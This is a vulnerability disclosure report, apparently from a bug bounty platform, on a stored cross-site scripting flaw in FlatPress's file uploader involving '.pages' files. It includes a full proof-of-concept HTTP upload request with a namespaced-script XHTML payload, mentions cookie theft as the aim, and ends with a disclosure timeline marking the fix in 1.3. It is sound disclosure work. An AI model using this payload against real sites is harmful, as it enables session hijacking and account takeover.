Stored XSS via `.pages` File in in flatpressblog/flatpress

Valid

Reported on

Jan 2nd 2023


Description

When user upload a file with .pages extension and direct access this file, the server response with Content-type: application/octet-stream lead to processing .pages as HTML file. I only discovered this file extension doing more research on XSS

Proof of Concept

POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 2051
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGDdtfAjfJHeGw497
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/flatpress-master/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; fpuser_fp-9a36daaa=admin; fppass_fp-9a36daaa=%242y%2410%24k7Y2.YM02Q4HFMKnFhhtTea2.GpaY4XW8JL0U05O%2FTIkIvWg%2FfYyy; fpuser_fp-9b7fc0a2=admin; fppass_fp-9b7fc0a2=%242y%2410%24cxsAXo1XdfPxtztQL8Ehuei7Un1fUCqJG%2Fm7IeIyLG1PIdGXEvxwi; security_level=0; fpsess_fp-9a36daaa=cchci3ludjhp8frr6dleds54b8; fpsess_fp-9b7fc0a2=a0b4ht1pq923t7ao89lgo4fcgb
Connection: close

------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wpnonce"

96b07d2bb9
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wp_http_referer"

/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload[]"; filename="xss.pages"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
    </body>
</html>
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload"

Upload
------WebKitFormBoundaryGDdtfAjfJHeGw497--

Steps to take

Log in and then access /admin.php?p=uploader&action=default Perform .Pages file upload, using malicious javascript to steal user cookies.

Empirical evidence

https://drive.google.com/file/d/1PG8Tiz63Sw6rBeRDPDYrBo4PQjGyikL5/view?usp=sharing

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. 4 months ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back 4 months ago
flatpressblog/flatpress maintainer validated this vulnerability 4 months ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit f6394e 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Mar 1st 2023
flatpressblog/flatpress maintainer published this vulnerability 2 months ago
to join this conversation